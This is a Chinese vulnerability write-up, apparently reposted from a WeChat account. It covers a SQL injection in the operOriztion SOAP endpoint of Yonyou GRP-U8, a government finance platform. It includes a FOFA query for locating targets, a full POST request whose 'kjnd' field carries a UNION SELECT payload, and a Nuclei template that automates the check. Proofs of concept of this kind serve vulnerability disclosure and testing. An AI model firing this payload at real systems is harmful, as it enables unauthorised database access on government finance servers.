用友GRP-U8 operOriztion SQL注入漏洞

2024年4月24日01:42:27评论12 views字数 1862阅读6分12秒阅读模式

0x00 阅读须知

免责声明：本文提供的信息和方法仅供网络安全专业人员用于教学和研究目的，不得用于任何非法活动。读者若使用文章内容从事任何未授权的行为，需自行承担所有法律责任和后果。本公众号及作者对由此引起的任何直接或间接损失不负责任。请严格遵守相关法律法规。

0x01 漏洞简介

用友GRP-U8是面向政府及行政事业单位的财政管理应用。这个系统在/services/operOriztion发现SQL注入漏洞。

用友GRP-U8 operOriztion SQL注入漏洞

0x02 漏洞详情

fofa：app="用友-GRP-U8"

Poc：

POST /services/operOriztion HTTP/1.1Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0Content-Type: text/xml;charset=UTF-8SOAPAction: ""Content-Length: 477<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsdd="http://xml.apache.org/axis/wsdd/"><soapenv:Header/><soapenv:Body><wsdd:getGsbmfaByKjnd soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><kjnd xsi:type="xsd:string">' UNION ALL SELECT @@version --</kjnd></wsdd:getGsbmfaByKjnd></soapenv:Body></soapenv:Envelope>

用友GRP-U8 operOriztion SQL注入漏洞

0x03 Nuclie

id: yongyou_grp_u8-operOriztion-sqliinfo:  name: yongyou_grp_u8-operOriztion-sqli  author: unknow  severity: high  description: 用友GRP-U8 operOriztion SQL注入漏洞  tags: yongyou,sqli  metadata:    fofa-qeury: app="用友-GRP-U8"http:  - raw:      - |                      POST /services/operOriztion HTTP/1.1        Host:         User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0        Content-Type: text/xml;charset=UTF-8        SOAPAction: ""        Content-Length: 477        <soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsdd="http://xml.apache.org/axis/wsdd/">        <soapenv:Header/>        <soapenv:Body>        <wsdd:getGsbmfaByKjnd soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">        <kjnd xsi:type="xsd:string">' UNION ALL SELECT @@version --</kjnd>        </wsdd:getGsbmfaByKjnd>        </soapenv:Body>        </soapenv:Envelope>    matchers:           - type: dsl        name: sqli        dsl:          - (status_code==200 )  && contains(body, "Microsoft SQL Server")

用友GRP-U8 operOriztion SQL注入漏洞

原文始发于微信公众号（贫僧法号云空）：用友GRP-U8 operOriztion SQL注入漏洞

左青龙
微信扫一扫

右白虎
微信扫一扫

用友GRP-U8 operOriztion SQL注入漏洞

0x01 漏洞简介

0x02 漏洞详情

CVE-2024-28253 :OpenMetadata

CVE-2024-27956 WordPress Automatic SQL注入漏洞可添加后台账号

用友NC down/bill存在SQL注入漏洞(XVE-2024-9469)

CVE-2024-23722

CVE-2024-0783

CNVD-2024-06148

CVE-2024-4040｜CrushFTP 认证绕过模板注入漏洞（POC）

【漏洞复现】ZenTao（禅道）身份认证绕过漏洞（QVD-2024-15263）

（CVE-2024-25648）福昕阅读器 ComboBox 小部件格式事件 UAF

漏洞复现 || SpringBlade dict-biz/list接口SQL注入

发表评论

在线咨询

微信